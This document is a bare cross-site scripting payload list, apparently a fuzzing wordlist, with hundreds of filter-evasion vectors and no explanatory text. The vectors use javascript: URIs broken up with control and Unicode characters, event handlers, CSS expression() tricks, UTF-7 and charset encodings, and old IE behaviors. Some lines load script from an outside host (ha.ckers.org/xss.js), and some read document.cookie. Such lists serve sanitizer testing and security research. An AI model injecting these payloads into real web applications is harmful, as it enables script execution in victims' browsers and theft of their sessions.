<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><
br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br>
<br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test
onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction
actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div
style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden
onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="`ònmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>">


<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)"
style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-
source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo
;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/
foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHI
AdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/
script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=ùrn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)`
attributename=ìnnerhtml`
to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)
attributename=innerhtml
values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%
(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute
href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0
to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);"
folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss"
datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-
event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"
implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image:
url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javascript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><
br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/
script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</
html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascr
ipt:alert(1)&gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
00088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
